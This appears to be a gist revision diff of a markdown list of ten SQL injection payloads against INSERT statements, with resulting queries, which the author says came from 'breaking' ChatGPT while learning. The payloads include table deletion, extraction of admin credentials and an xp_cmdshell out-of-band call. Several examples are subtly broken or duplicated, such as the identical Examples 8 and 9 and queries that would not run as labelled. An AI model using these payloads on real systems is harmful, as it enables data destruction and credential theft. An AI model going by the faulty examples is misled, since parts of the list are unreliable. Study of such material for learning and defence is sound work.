shriyanss · January 7, 2025 19:09 · Nov 18, 2023 · Nov 18, 2023
diff --git a/sql-insert.md b/sql-insert.md
@@ -1,4 +1,6 @@
 ## Must read
+This is for SQL INSERT statement. For SELECT statements, please see https://gist.github.com/shriyanss/6192ee7eb80da5efc26916922fc9b035
+
 ***I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:-***
 
 Certainly, here are examples of malicious inputs that could lead to SQL injection vulnerabilities in `INSERT` statements, along with the resulting queries. As always, it's crucial to use parameterized queries or prepared statements to prevent SQL injection.

diff --git a/sql-insert.md b/sql-insert.md
@@ -0,0 +1,106 @@
+## Must read
+***I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:-***
+
+Certainly, here are examples of malicious inputs that could lead to SQL injection vulnerabilities in `INSERT` statements, along with the resulting queries. As always, it's crucial to use parameterized queries or prepared statements to prevent SQL injection.
+
+### Example 1: Classic SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+'); DROP TABLE Users; --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES (''); DROP TABLE Users; --', 'password');
+```
+
+### Example 2: Union-based SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+', 'Malicious Data') UNION SELECT null, null; --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES ('', 'Malicious Data') UNION SELECT null, null; --', 'password');
+```
+
+### Example 3: Error-based SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+'); CREATE TABLE TestTable (ID INT); --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES (''); CREATE TABLE TestTable (ID INT); --', 'password');
+```
+
+### Example 4: Time-based Blind SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+', IF(1=1, SLEEP(5), 0); --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES ('', IF(1=1, SLEEP(5), 0); --', 'password');
+```
+
+### Example 5: Boolean-based Blind SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+', '1'='1' AND 'a'='a'; --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES ('', '1'='1' AND 'a'='a'; --', 'password');
+```
+
+### Example 6: Out-of-Band SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+'); EXEC xp_cmdshell('nslookup example.com'); --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES (''); EXEC xp_cmdshell('nslookup example.com'); --', 'password');
+```
+
+### Example 7: UNION-Based SQL Injection in INSERT (Extracting Data)
+**Malicious Input:**
+```plaintext
+', (SELECT username FROM admin_users), (SELECT password FROM admin_users)); --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES ('', (SELECT username FROM admin_users), (SELECT password FROM admin_users)); --', 'password');
+```
+
+### Example 8: Tautology-Based SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+', 1=1; --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES ('', 1=1; --', 'password');
+```
+
+### Example 9: Numeric-Based SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+', 1=1; --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES ('', 1=1; --', 'password');
+```
+
+### Example 10: Time Delay SQL Injection in INSERT
+**Malicious Input:**
+```plaintext
+'); IF(1=1, SLEEP(5), 0); --
+```
+**Resultant Query:**
+```sql
+INSERT INTO Users (Username, Password) VALUES (''); IF(1=1, SLEEP(5), 0); --', 'password');
+```
+
+Prevent SQL injection in `INSERT` statements by using parameterized queries or prepared statements and ensuring proper validation and sanitization of user inputs.